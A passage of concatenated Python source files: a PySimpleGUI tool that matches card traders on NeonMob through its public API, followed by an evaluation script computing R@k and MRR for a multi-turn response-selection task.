cardcheck = True
break
if cardcheck:
mastercheck = True
for wantedid in want:
cardcheck = False
for wantedcard in person['wants']:
if wantedid == wantedcard['card_id']:
cardcheck = True
break
if cardcheck:
mastercheck = True
if mastercheck and not printcheck:
master.append(person)
return master
# GUI SECTION
defaultsets = [['', '', '', '']]
defaultcards = [['', '', '']]
defaultcards2 = [['', '', '', '']]
defaultpeople = [['', '', '', '']]
def make_mainwindow():
"""Builds the main window where the user creates a search query
:return: Built window (finalized)
:rtype: PySimpleGUI.Window
"""
table1 = [[sg.Table(defaultsets, num_rows=10, key='-TABLE1-', headings=['Rarity', 'Card Name', 'Set Name', 'id'],
col_widths=[10, 30, 30, 9], auto_size_columns=False, justification='left',
visible_column_map=[True, True, True, False])]]
table2 = [[sg.Table(defaultsets, num_rows=10, key='-TABLE2-', headings=['Rarity', 'Card Name', 'Set Name', 'id'],
col_widths=[10, 30, 30, 9], auto_size_columns=False, justification='left',
visible_column_map=[True, True, True, False])]]
column1 = [[sg.Button('+', key='-OTHERADD-')],
[sg.Button('-', key='-OTHERREMOVE-')],
[sg.Button('C', key='-OTHERCLEAR-')]]
column2 = [[sg.Button('+', key='-YOUADD-')],
[sg.Button('-', key='-YOUREMOVE-')],
[sg.Button('C', key='-YOUCLEAR-')]]
frame1 = [[sg.Column(table1), sg.Column(column1)]]
frame2 = [[sg.Column(table2), sg.Column(column2)]]
if sys.platform == 'darwin':
menu = sg.Menu([['&File', ['Settings', '---', 'Update Database', 'Purge Cache', '---', 'E&xit']]])
else:
menu = sg.Menu([['&File', ['Settings', '---', 'Update Database', 'Purge Cache', '---', 'E&xit']]],
background_color='#FFFFFF', text_color='#000000')
layout = [[menu],
[sg.Frame(layout=frame1, title="Cards I'm seeking from someone else"), sg.Frame(layout=frame2, title="Cards I want to trade away")],
[sg.Button('Search', key='-SEARCHBUTTON-'), sg.Checkbox('Force Refresh', default=False, key='-REFRESH-'),
sg.Combo(['And', 'Or'], 'And', key='-MODE-', readonly=True), sg.Checkbox('2+ Prints', default=True, key='-PRINTS-')]]
window = sg.Window('NeonMobMatcher v1.0.0', layout, finalize=True, resizable=True)
# window.maximize()
return window
def make_setwindow():
"""Builds the set selection window
:return: Built window (finalized)
:rtype: PySimpleGUI.Window
"""
global RECENT, TARGET
if not RECENT:
loadRecent()
if TARGET == 0:
target_text = "Another Person Has:"
else:
target_text = "You Have:"
layout = [[sg.Input(size=(30, 1), enable_events=True, key='-INPUT-', tooltip='Search for a set by name', focus=True)],
[sg.Table(RECENT, num_rows=15, key='-SETTABLE-', headings=['Set Name', 'Author', ' ', 'id'],
col_widths=[30, 20, 3, 8], auto_size_columns=False, justification='left',
visible_column_map=[True, True, True, False], bind_return_key=True)],
[sg.Button('OK'), sg.Button('Cancel')]]
window = sg.Window('Set Selection | ' + target_text, layout, finalize=True)
return window
def make_cardwindow(setid):
"""Builds the card selection window
:param int setid: The id of the set to show cards for
:return: Built window (finalized)
:rtype: PySimpleGUI.Window
"""
global TARGET
if TARGET == 0:
target_text = "Another Person Has:"
else:
target_text = "You Have:"
layout = [[sg.Table(defaultcards, num_rows=15, key='-CARDTABLE-',
headings=['Rarity', 'Card Name', 'Set Name', 'id'], col_widths=[10, 30, 30, 9],
auto_size_columns=False, justification='left', visible_column_map=[True, True, False, False],
right_click_menu=['&Right', ['Sort By Rarity', 'Sort By Name']], select_mode=sg.TABLE_SELECT_MODE_EXTENDED)],
[sg.Button('OK'), sg.Button('Cancel'), sg.Button('Refresh'),
sg.Combo(['Common', 'Uncommon', 'Rare', 'Very Rare', 'Extra Rare', 'Chase', 'Variant'], key='-RARITY-', readonly=True),
sg.Button('Add All of Rarity')]]
window = sg.Window('Card Selection | ' + target_text, layout, finalize=True)
new_rows = processCards(GetCards(setid))
window['-CARDTABLE-'].update(new_rows)
return window
def make_resultwindow(results):
"""Builds the search results window
:param List[Dict[str, Union[int, str, float, List[Dict[str, Union[int, str]]]]]] results: A list of raw trade search results
:return: Built window (finalized)
:rtype: PySimpleGUI.Window
"""
table1 = [[sg.Table(defaultcards2, num_rows=10, key='-OWNTABLE-',
headings=['Rarity', 'Card Name', 'Set Name', 'Prints', 'id'], col_widths=[10, 20, 20, 5, 9],
auto_size_columns=False, justification='left',
visible_column_map=[True, True, True, True, False],
right_click_menu=['&Right', ['Option 1', 'Option 2']], enable_events=True)]]
table2 = [[sg.Table(defaultcards2, num_rows=10, key='-WANTTABLE-',
headings=['Rarity', 'Card Name', 'Set Name', 'Wishlisted', 'id'], col_widths=[10, 20, 20, 8, 9],
auto_size_columns=False, justification='left',
visible_column_map=[True, True, True, True, False],
right_click_menu=['&Right', ['Option 1', 'Option 2']])]]
frame1 = [[sg.Column(table1)]]
frame2 = [[sg.Column(table2)]]
layout = [[sg.Table(defaultpeople, num_rows=15, key='-PEOPLETABLE-',
headings=['Name', 'Grade', 'Have', 'Want', 'id'], col_widths=[20, 5, 5, 5, 9],
auto_size_columns=False, justification='left',
visible_column_map=[True, True, True, True, False],
right_click_menu=['&Right', ['Option 1', 'Option 2']], enable_events=True)],
[sg.Frame(layout=frame1, title="___ Has:", key='-OTHERFRAME-'),
sg.Frame(layout=frame2, title="You Have:")],
[sg.Button('OK'), sg.Button('Open User Profile'), sg.Text('', key='-PRINTNUMS-')]]
window = sg.Window('Results', layout, finalize=True)
new_rows = processResults(results)
window['-PEOPLETABLE-'].update(new_rows)
return window
def make_settingswindow():
"""Builds the settings window
:return: Built window (finalized)
:rtype: PySimpleGUI.Window
"""
# Database
# Cache
# History
column1 = sg.Column([[sg.Text('Set DB Path (must end in .json):'), sg.InputText(setdbpath, key='-SETDBPATH-')],
[sg.Checkbox('Auto-update DB on startup?', key='-AUTOUPDATE-', default=AUTOUPDATE)]])
column2 = sg.Column([[sg.Text('Cache keep-alive time (minutes):'), sg.InputText(str(keepalivemins), key='-KEEPALIVE-')]])
column3 = sg.Column([[sg.Text('Maximum recent sets to remember:'), sg.InputText(str(MAXRECENT), key='-MAXRECENT-')]])
frame1 = [[column1]]
frame2 = [[column2]]
frame3 = [[column3]]
layout = [[sg.Frame(layout=frame1, title='Database')],
[sg.Frame(layout=frame2, title='Cache')],
[sg.Frame(layout=frame3, title='History')],
[sg.Button('OK'), sg.Button('Cancel')]]
window = sg.Window('Settings', layout, finalize=True)
return window
items1 = []
items2 = []
SETID = 0
RESULTS = []
SEARCHING = False
# MAIN EVENT LOOP
def main():
global TARGET, SETID, RESULTS, RECENT, setdbpath, MAXRECENT, keepalivemins, AUTOUPDATE, SEARCHING
loadSettings()
window1, window2, window3, window4, settingswindow = make_mainwindow(), None, None, None, None
updatedb(beannoying=False) # Please don't be annoying on startup :)
while True:
window, event, values = sg.read_all_windows()
print(event, values)
if window == window1 and event in (sg.WIN_CLOSED, 'Exit'): # Close the program if main window is closed or File -> Exit is selected
break
# Main window
if event == 'Settings' and not SEARCHING: # From File menu
settingswindow = make_settingswindow()
continue
elif event == 'Update Database' and not SEARCHING: # From File menu
updatedb()
elif event == 'Purge Cache' and not SEARCHING: # From File menu
if sg.popup_yes_no("Are you sure you want to purge the cache? Loading times will be significantly impacted.") == 'Yes':
purgeCache()
sg.popup("Cache successfully purged!")
if event == '-SEARCHBUTTON-':
if not SEARCHING:
SEARCHING = True
window['-SEARCHBUTTON-'].update(disabled=True)
window['-REFRESH-'].update(disabled=True)
window['-MODE-'].update(disabled=True)
window['-PRINTS-'].update(disabled=True)
if window4 is not None: # If results from a previous search are still on the screen, kill that window to begin the next search
window4.close()
window4 = None
if window3 is not None: # If the user is still searching through cards, close that window to begin the search
window3.close()
window3 = None
if window2 is not None: # If the user is still searching through sets, close that window to begin the search
window2.close()
window2 = None
if settingswindow is not None: # If the user is changing settings, close that window to begin the search
settingswindow.close()
settingswindow = None
# print(items1)
# print(items2)
if len(items1) == 0 or len(items2) == 0:
sg.popup_error("Please add items to both lists")
else:
canceled = False
owners = []
for card in items1:
carddict = {'name': card[1], 'rarity': card[0], 'id': card[3], 'setName': card[2]}
newowners = GetOwners(carddict, force=values['-REFRESH-'])
if newowners == -1:
canceled = True
break
else:
owners.append(newowners)
seekers = []
if not canceled:
for card in items2:
carddict = {'name': card[1], 'rarity': card[0], 'id': card[3], 'setName': card[2]}
newseekers = GetSeekers(carddict, force=values['-REFRESH-'])
if newseekers == -1:
canceled = True
break
else:
seekers.append(newseekers)
if canceled:
sg.popup("Search was canceled.")
else:
combined = combinePeople(owners, seekers)
filtered = getCommons(combined, [x[3] for x in items1], [x[3] for x in items2], mode=values['-MODE-'].lower(), checkprintcount=values['-PRINTS-'])
RESULTS = filtered
# print(filtered)
window4 = make_resultwindow(RESULTS)
SEARCHING = False
window['-SEARCHBUTTON-'].update(disabled=False)
window['-REFRESH-'].update(disabled=False)
window['-MODE-'].update(disabled=False)
window['-PRINTS-'].update(disabled=False)
continue
# Left side (other person)
if event == '-OTHERADD-' and not SEARCHING: # Start searching for user-owned cards
if window2 is not None:
window2.ding()
window2.bring_to_front()
elif window3 is not None:
window3.ding()
window3.bring_to_front()
else:
TARGET = 0
window2 = make_setwindow()
continue
elif event == '-OTHERREMOVE-' and not SEARCHING: # Remove user-owned card from trade list
try:
items1.pop(values['-TABLE1-'][0])
except IndexError:
pass
window1['-TABLE1-'].update(items1)
elif event == '-OTHERCLEAR-' and not SEARCHING: # Clear user-owned card list
if sg.popup_yes_no("Really clear?") == 'Yes':
items1.clear()
window1['-TABLE1-'].update(items1)
# Right side (you)
elif event == '-YOUADD-' and not SEARCHING: # Start searching for user-wanted cards
if window2 is not None:
window2.ding()
window2.bring_to_front()
elif window3 is not None:
window3.ding()
window3.bring_to_front()
else:
TARGET = 1
window2 = make_setwindow()
continue
elif event == '-YOUREMOVE-' and not SEARCHING: # Remove user-wanted cards from trade list
try:
items2.pop(values['-TABLE2-'][0])
except IndexError:
pass
window1['-TABLE2-'].update(items2)
elif event == '-YOUCLEAR-' and not SEARCHING: # Clear user-wanted card list
if sg.popup_yes_no("Really clear?") == 'Yes':
items2.clear()
window1['-TABLE2-'].update(items2)
# Set window
if window == window2 and event in (sg.WIN_CLOSED, 'Cancel'): # Close the set selection window if it is closed or Exit is pressed
window2.close()
window2 = None
continue
if window == window2 and values['-INPUT-'] != '': # Update search results when a character is typed in the search box
search = values['-INPUT-']
new_values = searchDB(search)
new_rows = processSets(new_values)
window['-SETTABLE-'].update(new_rows)
elif window == window2: # If nothing is in the search box, display recent sets
if not RECENT:
loadRecent()
window['-SETTABLE-'].update(RECENT)
if window == window2 and (event == 'OK' or event == '-SETTABLE-') and len(values['-SETTABLE-']): # Move on to card selection if OK is pressed or a set is selected or double-clicked
selected = window['-SETTABLE-'].get()[values['-SETTABLE-'][0]]
if selected in RECENT:
RECENT.remove(selected)
RECENT.insert(0, selected)
saveRecent()
SETID = selected[3]
window3 = make_cardwindow(SETID)
window2.close()
window2 = None
continue
# Card window
if window == window3 and event in (sg.WIN_CLOSED, 'Cancel'): # Close the card selection window if it is closed or Exit is pressed
window3.close()
window3 = None
continue
if window == window3 and event == 'Add All of Rarity' and values['-RARITY-'] != '': # If 'Add All of Rarity' is pressed and a rarity is selected, add all cards of the selected rarity to the main window
current_rows = window['-CARDTABLE-'].get()
rarity_cards = []
for row in current_rows:
if row[0] == values['-RARITY-']:
rarity_cards.append(row)
if TARGET == 0:
items1.extend(rarity_cards)
window1['-TABLE1-'].update(items1)
else:
items2.extend(rarity_cards)
window1['-TABLE2-'].update(items2)
window3.close()
window3 = None
continue
elif window == window3 and event == 'OK' and len(values['-CARDTABLE-']): # If OK is pressed and at least 1 card is selected, add the card(s) to the main window
indexes = values['-CARDTABLE-']
items = window['-CARDTABLE-'].get()
selected = []
for index in indexes:
selected.append(items[index])
if TARGET == 0:
items1.extend(selected)
window1['-TABLE1-'].update(items1)
else:
items2.extend(selected)
window1['-TABLE2-'].update(items2)
window3.close()
window3 = None
continue
elif window == window3 and event == 'Refresh': # Re-download card data and refresh the window when Refresh is pressed
new_rows = processCards(GetCards(SETID, force=True))
window['-CARDTABLE-'].update(new_rows)
elif window == window3 and event == 'Sort By Rarity': # Sorts the card list by rarity when the table is right-clicked
current_rows = window['-CARDTABLE-'].get()
new_rows = []
for rarity in ['Common', 'Uncommon', 'Rare', 'Very Rare', 'Extra Rare', 'Chase', 'Variant']:
for row in current_rows:
if row[0] == rarity:
new_rows.append(row)
window['-CARDTABLE-'].update(new_rows)
elif window == window3 and event == 'Sort By Name': # Sorts the card list by name when the table is right-clicked
current_rows = window['-CARDTABLE-'].get()
new_rows = sorted(current_rows, key=lambda rowx: rowx[1])
window['-CARDTABLE-'].update(new_rows)
# Result window
if window == window4 and event in ('OK', sg.WIN_CLOSED): # Close the result window if it is closed or OK is pressed
window4.close()
window4 = None
continue
if window == window4 and event == '-PEOPLETABLE-' and len(values['-PEOPLETABLE-']): # Update the two bottom tables when a result from the top table is selected
index = values['-PEOPLETABLE-'][0]
owned = []
# noinspection PyTypeChecker
for ownedcard in RESULTS[index]['owns']:
owned.append(
[ownedcard['rarity'], ownedcard['card_name'], ownedcard['set_name'], ownedcard['print_count'],
ownedcard['card_id']])
wanted = []
# noinspection PyTypeChecker
for wantedcard in RESULTS[index]['wants']:
wanted.append(
[wantedcard['rarity'], wantedcard['card_name'], wantedcard['set_name'], 'Yes' if wantedcard['wishlisted'] else 'No',
wantedcard['card_id']])
window['-OWNTABLE-'].update(owned)
window['-WANTTABLE-'].update(wanted)
# noinspection PyTypeChecker
window['-OTHERFRAME-'].update(value=RESULTS[index]['name'] + " Has:")
window['-PRINTNUMS-'].update(value='')
elif event == '-OWNTABLE-' and len(values['-OWNTABLE-']) and len(values['-PEOPLETABLE-']): # Display print numbers when a card in the bottom left table is selected
cardindex = values['-OWNTABLE-'][0]
personindex = values['-PEOPLETABLE-'][0]
# noinspection PyTypeChecker
userid = RESULTS[personindex]['id']
cardid = window['-OWNTABLE-'].get()[cardindex][4]
data = requests.request('GET', 'https://www.neonmob.com/api/users/' + str(userid) + '/piece/' + str(cardid) + '/detail/').json()
# print(data['refs'][data['payload'][1]]['prints'])
prints = []
for copy in data['refs'][data['payload'][1]]['prints']:
prints.append(copy['print_num'])
window['-PRINTNUMS-'].update(value='Print Numbers: ' + ', '.join(str(i) for i in prints))
if window == window4 and event == 'Open User Profile' and len(values['-PEOPLETABLE-']): # Open a user's profile when a user from the result list is selected and the button is pressed
index = values['-PEOPLETABLE-'][0]
# noinspection PyTypeChecker
webbrowser.open_new_tab('https://www.neonmob.com/user/' + str(RESULTS[index]['id']))
# Settings window
if window == settingswindow and event == 'OK': # Saves settings when OK is pressed
setdbpath = values['-SETDBPATH-']
AUTOUPDATE = bool(values['-AUTOUPDATE-'])
keepalivemins = int(values['-KEEPALIVE-'])
MAXRECENT = int(values['-MAXRECENT-'])
saveSettings()
sg.popup("Settings saved!")
settingswindow.close()
settingswindow = None
continue
elif window == settingswindow and event in ('Cancel', sg.WIN_CLOSED): # Closes the settings window when it is closed or Cancel is pressed
settingswindow.close()
settingswindow = None
continue
# Make sure all other windows get closed when the program "shuts down" (breaks out of the main loop)
window1.close()
if window2 is not None:
window2.close()
if window3 is not None:
window3.close()
if window4 is not None:
window4.close()
if settingswindow is not None:
settingswindow.close()
if __name__ == '__main__':
main()
```
#### File: neonmobmatcher/old-dev/core.py
```python
import requests
from conditional import conditional
from alive_progress import alive_bar
import time
import json
from os import path
from timeit import default_timer as timer
SCACHE = {}
OCACHE = {}
keepalivemins = 10
setdbpath = "db.json"
SETDB = {}
def loadSetDB():
global SETDB
with open(setdbpath, 'r') as f:
SETDB = json.load(f)
def printseries(serieslist):
for series in serieslist:
print(series['name'] + ' (' + str(series['id']) + ') by ' + series['creator']['username'] + ': ' + series['difficulty'] + ' ' + series['edition_size'] + ' series')
def searchDB(query):
global SETDB
start = timer()
if SETDB == {}:
loadSetDB()
filtered = list(filter(lambda series: query.lower() in series['name'].lower() or query.lower() in series['name_slug'].lower() or query.lower() in series['creator']['username'].lower() or query.lower() in series['creator']['name'], SETDB))
filtered.reverse()
printseries(filtered)
end = timer()
print(str(len(filtered)) + " results in " + str(end - start))
def loadCache():
global SCACHE, OCACHE
with open('cache/scache.json', 'r') as f:
SCACHE = json.load(f)
with open('cache/ocache.json', 'r') as f:
OCACHE = json.load(f)
def purgeCache():
global SCACHE, OCACHE
loadCache()
currentMillis = int(round(time.time() * 1000))
for k in list(SCACHE.keys()):
if currentMillis - SCACHE[k]['time'] >= (keepalivemins * 60 * 1000):
del SCACHE[k]
for k in list(OCACHE.keys()):
if currentMillis - OCACHE[k]['time'] >= (keepalivemins * 60 * 1000):
del OCACHE[k]
saveCache()
def saveCache():
global SCACHE, OCACHE
with open('cache/scache.json', 'w') as f:
json.dump(SCACHE, f)
with open('cache/ocache.json', 'w') as f:
json.dump(OCACHE, f)
def loadCards(setid):
if path.exists('cache/cards/' + str(setid) + '.json'):
with open('cache/cards/' + str(setid) + '.json', 'r') as f:
cards = json.load(f)
return cards
else:
return 0
def saveCards(setid, cards):
with open('cache/cards/' + str(setid) + '.json', 'w') as f:
json.dump(cards, f)
def GetCards(setid, showBar, force=False):
cards = loadCards(setid)
if cards != 0 and not force:
print("Card found in cache")
return cards
set_url = "https://www.neonmob.com/api/setts/" + str(setid) + "/"
data = requests.request('GET', set_url).json()
set_name = data['name']
total = 0
for cat in range(len(data['core_stats'])):
total += data['core_stats'][cat]['total']
for cat in range(len(data['special_stats'])):
total += data['special_stats'][cat]['total']
print("\nGetting cards from series \"" + set_name + "\"...")
cards = []
nxt = "/api/sets/" + str(setid) + "/pieces/"
with conditional(showBar, alive_bar(total, bar='smooth', spinner='dots_recur')) as bar:
first = True
while True:
raw = requests.request('GET', "https://www.neonmob.com" + nxt)
if raw.status_code == 500 and first:
print("Using fallback card endpoint...")
raw = requests.request('GET', "https://www.neonmob.com/api/sets/" + str(setid) + "/piece-names")
data = raw.json()
for card in data:
cards.append({'name': card['name'],
'id': card['id'],
'setName': set_name})
if showBar:
bar()
if not showBar:
print('...', end="", flush=True)
break
else:
data = raw.json()
nxt = data['payload']['metadata']['resultset']['link']['next']
for card in data['payload']['results']:
cards.append({'name': card['name'],
'id': card['id'],
'setName': set_name})
if showBar:
bar()
if not showBar:
print(". ", end="", flush=True)
first = False
if not nxt:
break
saveCards(setid, cards)
return cards
def GetSeekers(card, showBar, force=False):
global SCACHE
purgeCache()
if card['id'] == -1:
print("\nCouldn't find card " + card['name'] + " in set " + card['setName'])
return []
currentMillis = int(round(time.time() * 1000))
if str(card['id']) in SCACHE.keys() and not force:
print("Card is in cache")
if currentMillis - SCACHE[str(card['id'])]['time'] < (keepalivemins * 60 * 1000):
print("Time is under 10 minutes")
return SCACHE[str(card['id'])]['seekers']
print("\nGetting seekers of " + card['name'] + " [" + str(card['id']) + "]...")
seekers = []
data = requests.request('GET', "https://www.neonmob.com/api/pieces/" + str(card['id']) + "/needers/?completion=desc&grade=desc&wishlist=desc").json()
total = data['count']
with conditional(showBar, alive_bar(total, bar='smooth', spinner='dots_recur')) as bar:
while True:
nxt = data['next']
for seeker in data['results']:
seekers.append({'id': seeker['id'],
'name': seeker['name'],
'trader_score': seeker['trader_score'],
'wishlisted': seeker['wishlisted'],
'needs_special_piece_count': seeker['special_piece_count'],
'needs_owned_special_piece_count': seeker['owned_special_piece_count'],
'needs_owned_percentage': seeker['owned_percentage']})
if showBar:
bar()
if not showBar:
print(". ", end="", flush=True)
if not nxt:
break
data = requests.request('GET', "https://www.neonmob.com" + nxt).json()
try:
SCACHE.pop(str(card['id']))
except KeyError:
print("Card is not in cache")
currentMillis = int(round(time.time() * 1000))
SCACHE.update({card['id']: {'time': currentMillis, 'cardName': card['name'], 'setName': card['setName'], 'seekers': seekers}})
saveCache()
return seekers
def GetOwners(card, showBar, force=False):
global OCACHE
purgeCache()
if card['id'] == -1:
print("\nCouldn't find card " + card['name'] + " in set " + card['setName'])
return []
currentMillis = int(round(time.time() * 1000))
if str(card['id']) in OCACHE.keys() and not force:
print("Card is in cache")
if currentMillis - OCACHE[str(card['id'])]['time'] < (keepalivemins * 60 * 1000):
print("Time is under 10 minutes")
return OCACHE[str(card['id'])]['owners']
print("\nGetting owners of " + card['name'] + " [" + str(card['id']) + "]...")
owners = []
data = requests.request('GET', "https://www.neonmob.com/api/pieces/" + str(card['id']) + "/owners/?completion=asc&grade=desc&owned=desc").json()
total = data['count']
with conditional(showBar, alive_bar(total, bar='smooth', spinner='dots_recur')) as bar:
while True:
nxt = data['next']
for owner in data['results']:
owners.append({'id': owner['id'],
'name': owner['name'],
'trader_score': owner['trader_score'],
'print_count': owner['print_count'],
'has_special_piece_count': owner['special_piece_count'],
'has_owned_special_piece_count': owner['owned_special_piece_count'],
'has_owned_percentage': owner['owned_percentage'],
'has_card_name': card['name'],
'has_card_set_name': card['setName']})
if showBar:
bar()
if not showBar:
print(". ", end="", flush=True)
if not nxt:
break
data = requests.request('GET', "https://www.neonmob.com" + nxt).json()
try:
OCACHE.pop(str(card['id']))
except KeyError:
print("Card is not in cache")
currentMillis = int(round(time.time() * 1000))
OCACHE.update({card['id']: {'time': currentMillis, 'cardName': card['name'], 'setName': card['setName'], 'owners': owners}})
saveCache()
return owners
def main():
card = {'name': "<NAME>", 'id': 56093, 'setName': "RANDOM! the Comic TCC"}
# GetSeekers(card, True, force=True)
# GetOwners(card, True)
# GetCards(5908, True)
# purgeCache()
searchDB("art")
if __name__ == '__main__':
main()
```
#### File: neonmobmatcher/old-dev/gui5a.py
```python
import PySimpleGUI as sg
import json
sg.theme('DarkGrey9')
setdbpath = "db.json"
SETDB = {}
IDS = []
NAMES = []
def loadSetDB():
global SETDB
with open(setdbpath, 'r') as f:
SETDB = json.load(f)
def searchDB(query):
global SETDB
if SETDB == {}:
loadSetDB()
filtered = list(filter(lambda series: query.lower() in series['name'].lower() or query.lower() in series['name_slug'].lower(), SETDB))
# filtered = list(filter(lambda series: query.lower() in series['creator']['username'].lower() or query.lower() in series['creator']['name'].lower(), SETDB))
filtered.reverse()
return filtered
def processResults(results):
global IDS, NAMES
IDS = []
NAMES = []
for item in results:
IDS.append(item['id'])
NAMES.append(item['name'])
default = []
layout = [[sg.Input(size=(30, 1), enable_events=True, key='-INPUT-', tooltip='Search for a set by name', focus=True)],
[sg.Listbox(default, size=(30, 15), key='-LIST-')],
[sg.Button('OK'), sg.Button('Exit')]]
window = sg.Window('Listbox with Search', layout)
while True:
event, values = window.read()
print(event, values)
if event in (sg.WIN_CLOSED, 'Exit'):
break
if values['-INPUT-'] != '':
search = values['-INPUT-']
new_values = searchDB(search)
processResults(new_values)
window['-LIST-'].update(NAMES)
else:
window['-LIST-'].update(default)
if event == 'OK' and len(values['-LIST-']):
index = NAMES.index(values['-LIST-'][0])
sg.popup('Selected ', IDS[index])
# 22471 The Cabcuas
# 5682 Learn Your ABC's
window.close()
```
#### File: neonmobmatcher/old-dev/gui5c.py
```python
import PySimpleGUI as sg
import json
from os import path
import requests
sg.theme('DarkGrey9')
def loadCards(setid):
if path.exists('cache/cards/' + str(setid) + '.json'):
with open('cache/cards/' + str(setid) + '.json', 'r') as f:
cards = json.load(f)
return cards
else:
return 0
def saveCards(setid, cards):
with open('cache/cards/' + str(setid) + '.json', 'w') as f:
json.dump(cards, f)
def GetCards(setid, force=False):
cards = loadCards(setid)
if cards != 0 and not force:
print("Card found in cache")
return cards
set_url = "https://www.neonmob.com/api/setts/" + str(setid) + "/"
data = requests.request('GET', set_url).json()
set_name = data['name']
# total = 0
# for cat in range(len(data['core_stats'])):
# total += data['core_stats'][cat]['total']
# for cat in range(len(data['special_stats'])):
# total += data['special_stats'][cat]['total']
# print("\nGetting cards from series \"" + set_name + "\"...")
cards = []
raw = requests.request('GET', "https://www.neonmob.com/api/sets/" + str(setid) + "/piece-names")
data = raw.json()
for card in data:
cards.append({'name': card['name'],
'rarity': card['rarity']['name'],
'id': card['id'],
'setName': set_name})
saveCards(setid, cards)
return cards
def processCards(results):
rows = []
for item in results:
rows.append([item['rarity'], item['name'], item['setName'], item['id']])
return rows
defaultcards = [['', '', '']]
setid = int(sg.popup_get_text('Enter a series id'))
layout = [[sg.Table(defaultcards, num_rows=15, key='-CARDTABLE-', headings=['Rarity', 'Card Name', 'Set Name', 'id'], col_widths=[10, 30, 30, 9], auto_size_columns=False, justification='left', visible_column_map=[True, True, False, False], right_click_menu=['&Right', ['Sort By Rarity', 'Sort By Name']])],
[sg.Button('OK'), sg.Button('Exit'), sg.Button('Refresh')]]
window = sg.Window('Card Selection', layout, finalize=True)
new_rows = processCards(GetCards(setid))
window['-CARDTABLE-'].update(new_rows)
while True:
event, values = window.read()
print(event, values)
if event in (sg.WIN_CLOSED, 'Exit'):
break
elif event == 'Refresh':
new_rows = processCards(GetCards(setid, force=True))
window['-CARDTABLE-'].update(new_rows)
elif event == 'Sort By Rarity':
current_rows = window['-CARDTABLE-'].get()
new_rows = []
for rarity in ['Common', 'Uncommon', 'Rare', 'Very Rare', 'Extra Rare', 'Chase', 'Variant']:
for row in current_rows:
if row[0] == rarity:
new_rows.append(row)
window['-CARDTABLE-'].update(new_rows)
elif event == 'Sort By Name':
current_rows = window['-CARDTABLE-'].get()
new_rows = sorted(current_rows, key=lambda card: card[1])
window['-CARDTABLE-'].update(new_rows)
window.close()
```
#### File: neonmobmatcher/old-dev/gui5d.py
```python
import requests
import PySimpleGUI as sg
def GetOwners(card, force=False):
if card['id'] == -1:
print("\nCouldn't find card " + card['name'] + " in set " + card['setName'])
return []
# currentMillis = int(round(time.time() * 1000))
# if str(card['id']) in OCACHE.keys() and not force:
# print("Card is in cache")
# if currentMillis - OCACHE[str(card['id'])]['time'] < (keepalivemins * 60 * 1000):
# print("Time is under 10 minutes")
# return OCACHE[str(card['id'])]['owners']
print("\nGetting owners of " + card['name'] + " [" + str(card['id']) + "]...")
owners = []
data = requests.request('GET', "https://www.neonmob.com/api/pieces/" + str(card['id']) + "/owners/?completion=asc&grade=desc&owned=desc").json()
total = data['count']
i = 0
while True:
nxt = data['next']
for owner in data['results']:
owners.append({'id': owner['id'],
'name': owner['name'],
'trader_score': owner['trader_score'],
'owns': [
{
'card_id': card['id'],
'card_name': card['name'],
'set_name': card['setName'],
'print_count': owner['print_count'],
'total_specials': owner['special_piece_count'],
'specials': owner['owned_special_piece_count'],
'percentage': owner['owned_percentage']
}
],
'wants': []
})
i += 1
sg.one_line_progress_meter('My progress meter', i, total, "Getting owners of " + card['name'] + " [" + str(card['id']) + "]...", orientation='h')
if not nxt:
break
data = requests.request('GET', "https://www.neonmob.com" + nxt).json()
return owners
def GetSeekers(card, force=False):
if card['id'] == -1:
print("\nCouldn't find card " + card['name'] + " in set " + card['setName'])
return []
print("\nGetting seekers of " + card['name'] + " [" + str(card['id']) + "]...")
seekers = []
data = requests.request('GET', "https://www.neonmob.com/api/pieces/" + str(card['id']) + "/needers/?completion=desc&grade=desc&wishlist=desc").json()
total = data['count']
i = 0
while True:
nxt = data['next']
for seeker in data['results']:
seekers.append({'id': seeker['id'],
'name': seeker['name'],
'trader_score': seeker['trader_score'],
'wants': [
{
'card_id': card['id'],
'card_name': card['name'],
'set_name': card['setName'],
'wishlisted': seeker['wishlisted'],
'total_specials': seeker['special_piece_count'],
'specials': seeker['owned_special_piece_count'],
'percentage': seeker['owned_percentage']
}
],
'owns': []
})
i += 1
sg.one_line_progress_meter('My progress meter', i, total, "Getting seekers of " + card['name'] + " [" + str(card['id']) + "]...", orientation='h')
if not nxt:
break
data = requests.request('GET', "https://www.neonmob.com" + nxt).json()
return seekers
card1 = {'name': "<NAME>", 'id': 56093, 'setName': "RANDOM! the Comic TCC"}
GetSeekers(card1)
``` |
{
"source": "JoJoJun/NLPCC2018_Multi_Turn_Response_Selection",
"score": 3
} |
#### File: JoJoJun/NLPCC2018_Multi_Turn_Response_Selection/Evaluate.py
```python
from sklearn.metrics import classification_report
def ComputeR10_1(scores,labels,count = 11):
total = 0
correct = 0
for i in range(len(labels)):
if labels[i] == 1:
total = total+1
sublist = scores[i:i+count]
if max(sublist) == scores[i]:
correct = correct + 1
return str(float(correct)/ total)
def ComputeR2_1(scores,labels,count = 2):
total = 0
correct = 0
for i in range(len(labels)):
if labels[i] == 1:
total = total+1
sublist = scores[i:i+count]
if max(sublist) == scores[i]:
correct = correct + 1
return str(float(correct)/ total)
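# Illustrative example (assumed scores; each positive label starts a block of 2 candidates):
#   ComputeR2_1([0.8, 0.3, 0.2, 0.7], [1, 0, 1, 0])  ->  '0.5'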
def precision_of_classification(pred_label,true_label,class_num=2):
assert class_num==2,'You should design this function for your own task.'
return classification_report(true_label, pred_label, target_names=['not_match','can_match'])
def mrr_and_rnk(pred_score,true_label,response_num_per_query=11,k=[1,2,3,4,5]):
    # use this when each query has exactly one correct response
assert len(pred_score) == len(true_label), 'length not same'
result_of_rnk=[0.0]*len(k)
p=0
sample_num=len(true_label)
total_q_num=0.0
mrr_result=0.0
while p<sample_num:
one_q_p = pred_score[p:p + response_num_per_query]
one_q_t = true_label[p:p + response_num_per_query]
right_index = [i for i in range(0, len(one_q_t)) if one_q_t[i] == 1]
assert len(right_index) == 1, 'true label is not right'
pred_of_right_sample = one_q_p[right_index[0]]
index_of_value_of_bigger_than_valueof_oneqp_of_location_rightindex = [i for i in range(0, len(one_q_p)) if
pred_of_right_sample <= one_q_p[i]] #
mrr_result+=1.0/len(index_of_value_of_bigger_than_valueof_oneqp_of_location_rightindex)
rank=len(index_of_value_of_bigger_than_valueof_oneqp_of_location_rightindex)
for i in range(0,len(k)):
if rank<=k[i]:
result_of_rnk[i]+=1
total_q_num += 1
p += response_num_per_query
mrr_result=mrr_result/total_q_num
result_of_rnk=[r/total_q_num for r in result_of_rnk]
